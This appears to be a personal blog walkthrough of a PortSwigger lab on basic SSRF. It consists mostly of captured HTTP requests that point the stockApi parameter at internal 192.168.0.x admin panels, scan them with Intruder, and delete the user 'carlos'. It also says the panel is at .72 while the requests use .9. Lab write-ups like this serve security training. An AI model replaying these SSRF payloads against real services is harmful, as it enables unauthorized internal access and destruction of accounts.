Skip to content

chojnowski.it

Port Swigger Basic SSRF against another back end s

Port Swigger Basic SSRF against another back end s

Basic SSRF against another back-end system¶

Solution¶

Open the website: https://0a5d002d04cecaa980026cb8007000a8.web-security-academy.net/product?productId=1¶

https://0a5d002d04cecaa980026cb8007000a8.web-security-academy.net/product?productId=1

Find admin panel - Intruder¶

Admin panel on: 192.168.0.72
---
POST /product/stock HTTP/2
Host: 0a0300150321d7aa806b53f5004a0023.web-security-academy.net
Cookie: session=u45C63n9bAeEccDk3uJDeHa5d1oY7zvx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0300150321d7aa806b53f5004a0023.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://0a0300150321d7aa806b53f5004a0023.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

stockApi=http://192.168.0.$1$:8080/admin
---
POST /product/stock HTTP/2
Host: 0a0300150321d7aa806b53f5004a0023.web-security-academy.net
Cookie: session=u45C63n9bAeEccDk3uJDeHa5d1oY7zvx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0300150321d7aa806b53f5004a0023.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://0a0300150321d7aa806b53f5004a0023.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

stockApi=http://192.168.0.9:8080/admin

Delete username carlos: http://192.168.0.9:8080/admin/delete?username=carlos¶

POST /product/stock HTTP/2
Host: 0a0300150321d7aa806b53f5004a0023.web-security-academy.net
Cookie: session=u45C63n9bAeEccDk3uJDeHa5d1oY7zvx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0300150321d7aa806b53f5004a0023.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://0a0300150321d7aa806b53f5004a0023.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http://192.168.0.9:8080/admin/delete?username=carlos

Solved¶